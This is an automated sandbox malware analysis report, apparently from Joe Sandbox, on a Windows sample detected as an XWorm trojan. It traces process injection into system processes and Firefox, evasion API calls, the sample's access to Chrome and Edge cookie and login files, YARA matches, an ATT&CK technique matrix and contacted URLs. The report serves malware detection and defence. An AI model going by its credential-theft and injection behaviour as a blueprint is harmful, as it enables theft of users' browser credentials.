              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132E75D mov eax, dword ptr fs:[00000030h]3_2_0132E75D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0750 mov eax, dword ptr fs:[00000030h]3_2_012A0750
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2750 mov eax, dword ptr fs:[00000030h]3_2_012E2750
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2750 mov eax, dword ptr fs:[00000030h]3_2_012E2750
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A07AF mov eax, dword ptr fs:[00000030h]3_2_012A07AF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013547A0 mov eax, dword ptr fs:[00000030h]3_2_013547A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134678E mov eax, dword ptr fs:[00000030h]3_2_0134678E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C27ED mov eax, dword ptr fs:[00000030h]3_2_012C27ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C27ED mov eax, dword ptr fs:[00000030h]3_2_012C27ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C27ED mov eax, dword ptr fs:[00000030h]3_2_012C27ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A47FB mov eax, dword ptr fs:[00000030h]3_2_012A47FB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A47FB mov eax, dword ptr fs:[00000030h]3_2_012A47FB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132E7E1 mov eax, dword ptr fs:[00000030h]3_2_0132E7E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AC7C0 mov eax, dword ptr fs:[00000030h]3_2_012AC7C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013207C3 mov eax, dword ptr fs:[00000030h]3_2_013207C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A262C mov eax, dword ptr fs:[00000030h]3_2_012A262C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE627 mov eax, dword ptr fs:[00000030h]3_2_012BE627
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D6620 mov eax, dword ptr fs:[00000030h]3_2_012D6620
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8620 mov eax, dword ptr fs:[00000030h]3_2_012D8620
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtMapViewOfSection: Direct from: 0x77762D1C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtNotifyChangeKey: Direct from: 0x77763C2C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtCreateMutant: Direct from: 0x777635CC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtResumeThread: Direct from: 0x777636AC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtQuerySystemInformation: Direct from: 0x77762DFC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtReadFile: Direct from: 0x77762ADC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtDelayExecution: Direct from: 0x77762DDC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtWriteVirtualMemory: Direct from: 0x7776490C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtQueryInformationProcess: Direct from: 0x77762C26
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtResumeThread: Direct from: 0x77762FBC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtCreateUserProcess: Direct from: 0x7776371C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtSetInformationThread: Direct from: 0x777563F9
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtSetInformationThread: Direct from: 0x77762B4C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtQueryAttributesFile: Direct from: 0x77762E6C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtClose: Direct from: 0x77762B6C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtReadVirtualMemory: Direct from: 0x77762E8C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtCreateKey: Direct from: 0x77762C6C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtQuerySystemInformation: Direct from: 0x777648CC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtOpenSection: Direct from: 0x77762E0C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtQueryInformationToken: Direct from: 0x77762CAC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtTerminateThread: Direct from: 0x77762FCC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtCreateFile: Direct from: 0x77762FEC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtOpenFile: Direct from: 0x77762DCC
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtOpenKeyEx: Direct from: 0x77762B9C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtSetInformationProcess: Direct from: 0x77762C5C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory written: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory written: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: read write
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\chkntfs.exe Thread register set: target process: 8012
              Source: C:\Windows\SysWOW64\chkntfs.exe Thread APC queued: target process: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Process created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
              Source: C:\Windows\SysWOW64\chkntfs.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\chkntfs.exe Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              Source: Yara match | File source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\chkntfs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Source: Yara match | File source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

              [Behavior graph: ID: 1465534, Sample: 8hd98EhtIFcYkb8.exe, Startdate: 01/07/2024, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label | Link
              8hd98EhtIFcYkb8.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.XWorm |
              8hd98EhtIFcYkb8.exe | 100% | Avira | HEUR/AGEN.1308761 |
              8hd98EhtIFcYkb8.exe | 100% | Joe Sandbox ML | |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Local\Temp\aj34fjqh.exe | 100% | Joe Sandbox ML | |

              No Antivirus matches
              No Antivirus matches
                                                  unknown
                                                  https://www.sedo.com/services/parking.php3xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ac.ecosia.org/autocomplete?q=chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameaj34fjqh.exe, 00000018.00000002.3098875657.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlkchkntfs.exe, 0000000E.00000002.3707027734.00000000062FA000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.000000000494A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                  IP
                                                  127.0.0.1
                                                  Joe Sandbox version: 40.0.0 Tourmaline
                                                  Analysis ID: 1465534
                                                  Start date and time: 2024-07-01 19:22:08 +02:00
                                                  Joe Sandbox product: CloudBasic
                                                  Overall analysis duration: 0h 11m 11s
                                                  Hypervisor based Inspection enabled: false
                                                  Report type: full
                                                  Cookbook file name: default.jbs
                                                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed: 24
                                                  Number of new started drivers analysed: 0
                                                  Number of existing processes analysed: 0
                                                  Number of existing drivers analysed: 0
                                                  Number of injected processes analysed: 2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode: default
                                                  Analysis stop reason: Timeout
                                                  Sample name: 8hd98EhtIFcYkb8.exe
                                                  Detection: MAL
